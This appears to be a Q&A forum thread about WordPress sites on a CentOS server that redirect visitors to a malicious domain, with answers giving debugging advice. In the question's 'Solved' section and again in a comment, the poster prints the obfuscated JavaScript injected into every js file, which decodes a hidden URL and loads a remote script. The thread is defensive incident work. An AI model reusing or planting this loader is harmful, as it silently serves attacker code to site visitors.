4

I'm living my worse nightmare. I have an CentOS server, that is hosting 10s of WordPress website.

My clients notice that their websites are opening and after loading it is redirected to (fast.destinyfernandi.com) <---- Malware website.

I used ClamAV to detect the malware and clean them manually, without any success.

Here is the example of the Clamscan command result of one of the website:

----------- SCAN SUMMARY -----------
Known viruses: 6938202
Engine version: 0.101.5
Scanned directories: 2300
Scanned files: 91116
Infected files: 0
Data scanned: 4588.75 MB
Data read: 24121.63 MB (ratio 0.19:1)
Time: 1705.569 sec (28 m 25 s)

But this site is still redirecting to that malware website.

Have anyone came across such an issue?

Please help.

==================================Solved:=============================

The code was injected to all js files

var hglgfdrr4634hezfdg = 1; var d=document;var s=d.createElement('script'); s.type='text/javascript'; s.async=true;
var pl = String.fromCharCode(104,116,116,112,115,58,47,47,116,111,109,46,118,101,114,121,98,101,97,116,105,102,117,108,97,110,116,111,110,121,46,99,111,109,47,97,46,106,115); s.src=pl;
if (document.currentScript) {
document.currentScript.parentNode.insertBefore(s, document.currentScript);
} else {
d.getElementsByTagName('head')[0].appendChild(s);
}
Rami Alnairab
  • 43
  • 5
  • 2
    Found the malware code after a long night: `var hglgfdrr4634hezfdg = 1; var d=document;var s=d.createElement('script'); s.type='text/javascript'; s.async=true; var pl = String.fromCharCode(104,116,116,112,115,58,47,47,116,111,109,46,118,101,114,121,98,101,97,116,105,102,117,108,97,110,116,111,110,121,46,99,111,109,47,97,46,106,115); s.src=pl; if (document.currentScript) { document.currentScript.parentNode.insertBefore(s, document.currentScript); } else { d.getElementsByTagName('head')[0].appendChild(s); }` – Rami Alnairab Feb 26 '20 at 15:15
  • Did you found a permanent fix, we also facing same malware but after clean one week it attack again, non of solutions worked. – Suneth Kalhara Jul 04 '20 at 13:29

1 Answers1

2

There are several ways how your web resource could be redirected to destinyfernandi.

  1. database could be patched and your own ligitimate code does redirect
  2. some injected code in php or JS or html templates does redirect either via window.location or meta or headers of response.

First discover what address you gets redirected to , whether it is destinyfernandi or some other URL. I mean you could be redirected to some "invisible" URL1 and server which servicing URL1 would redirect browser further to destinyfernandi.

Once you discover what is the first hop (URL) in redirects you can search for bad URL in source code and database dump.

There is also a chance that first hop URL ( most likely destinyfernandi) is obfuscated in your code but lets hope it is not the case.

You can also add break point which fires on redirects which could help you to identify obfuscated piece of JS code:

window.addEventListener("beforeunload", function() { debugger; }, false)
Maxim Sagaydachny
  • 2,098
  • 3
  • 11
  • 22
  • Thanks for the break point code you provided :) – Rami Alnairab Feb 26 '20 at 15:16
  • @RamiAlnairab Did you found a permanent fix, we also facing same malware but after clean one week it attack again, non of solutions worked – Suneth Kalhara Jul 04 '20 at 13:28
  • Same thing is happening with us. We are updating the OS, WordPress, removing the Malware code manual. You can also try installing WP Firewall. It can help showing you the attacks, but doesn't catch the script. I will keep this posy updated with latest attacks. – Rami Alnairab Jul 05 '20 at 15:01